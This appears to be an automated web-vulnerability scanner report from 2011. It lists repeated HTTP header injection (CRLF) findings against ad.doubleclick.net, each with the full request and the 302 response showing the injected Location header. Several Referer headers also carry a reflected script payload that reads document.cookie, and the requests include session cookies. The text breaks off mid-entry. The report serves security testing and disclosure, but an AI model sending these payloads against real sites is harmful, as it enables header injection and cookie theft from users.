The value of REST URL parameter 1 is copied into the Location response header. The payload cdb71%0d%0a199c0f4f72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2521745cdb71%0d%0a199c0f4f72/newspeckle2.html HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2521745cdb71 199c0f4f72/newspeckle2.html: Date: Thu, 10 Mar 2011 22:19:54 GMT Server: GFE/2.0
The value of REST URL parameter 2 is copied into the Location response header. The payload b5b93%0d%0aad6e02800c7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /2521745/newspeckle2.htmlb5b93%0d%0aad6e02800c7 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2521745/newspeckle2.htmlb5b93 ad6e02800c7: Date: Thu, 10 Mar 2011 22:19:55 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload ccaaa%0d%0a9a571279f20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2521746ccaaa%0d%0a9a571279f20/bluecoverforma2.html HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2521746ccaaa 9a571279f20/bluecoverforma2.html: Date: Thu, 10 Mar 2011 16:40:59 GMT Server: GFE/2.0
The value of REST URL parameter 2 is copied into the Location response header. The payload 61c52%0d%0aec7d1b61be3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /2521746/bluecoverforma2.html61c52%0d%0aec7d1b61be3 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2521746/bluecoverforma2.html61c52 ec7d1b61be3: Date: Thu, 10 Mar 2011 16:41:06 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 76e46%0d%0a6bf3b474ea1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /76e46%0d%0a6bf3b474ea1/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/76e46 6bf3b474ea1/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851: Date: Thu, 10 Mar 2011 16:43:47 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2b2fd%0d%0ad346ead6547 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2b2fd%0d%0ad346ead6547/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2b2fd d346ead6547/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241: Date: Thu, 10 Mar 2011 16:46:03 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 22a11%0d%0adadb4ba6c5f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /22a11%0d%0adadb4ba6c5f/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/22a11 dadb4ba6c5f/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648: Date: Thu, 10 Mar 2011 16:42:57 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2180f%0d%0aa85c900d6a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2180f%0d%0aa85c900d6a3/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2180f a85c900d6a3/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241: Date: Thu, 10 Mar 2011 16:42:15 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2a8c1%0d%0ab4ae771faf2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2a8c1%0d%0ab4ae771faf2/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2a8c1 b4ae771faf2/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538: Date: Thu, 10 Mar 2011 16:43:13 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 57985%0d%0aea3a8bb8e04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /57985%0d%0aea3a8bb8e04/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/57985 ea3a8bb8e04/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632: Date: Thu, 10 Mar 2011 16:46:16 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 13e7e%0d%0a1300da2a990 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /13e7e%0d%0a1300da2a990/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/13e7e 1300da2a990/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648: Date: Thu, 10 Mar 2011 16:42:37 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1fcc3%0d%0a7b1aca2004 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1fcc3%0d%0a7b1aca2004/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1fcc3 7b1aca2004/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241: Date: Thu, 10 Mar 2011 16:45:59 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 77afd%0d%0acbd18977bd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /77afd%0d%0acbd18977bd0/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/77afd cbd18977bd0/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538: Date: Thu, 10 Mar 2011 16:43:11 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 9588d%0d%0a8b3a22ba789 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9588d%0d%0a8b3a22ba789/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9588d 8b3a22ba789/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632: Date: Thu, 10 Mar 2011 16:43:07 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 61558%0d%0ac1a8d314f34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /61558%0d%0ac1a8d314f34/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/61558 c1a8d314f34/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007: Date: Thu, 10 Mar 2011 16:43:41 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a76d%0d%0abcbbc2dd448 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a76d%0d%0abcbbc2dd448/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7a76d bcbbc2dd448/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899: Date: Thu, 10 Mar 2011 16:45:22 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 78aad%0d%0a049b38749bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /78aad%0d%0a049b38749bb/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/78aad 049b38749bb/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460: Date: Thu, 10 Mar 2011 16:43:32 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 77f38%0d%0a49cfd0de220 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /77f38%0d%0a49cfd0de220/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/77f38 49cfd0de220/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460: Date: Thu, 10 Mar 2011 16:43:32 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 84bba%0d%0a3dbcb4b9585 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /84bba%0d%0a3dbcb4b9585/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/84bba 3dbcb4b9585/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460: Date: Thu, 10 Mar 2011 16:43:33 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3c2b9%0d%0a6d4346a60d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3c2b9%0d%0a6d4346a60d9/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3c2b9 6d4346a60d9/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241: Date: Thu, 10 Mar 2011 16:42:35 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d03d%0d%0a4b47254b0af was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6d03d%0d%0a4b47254b0af/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
The value of REST URL parameter 1 is copied into the Location response header. The payload 6c73c%0d%0a2b896a07724 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
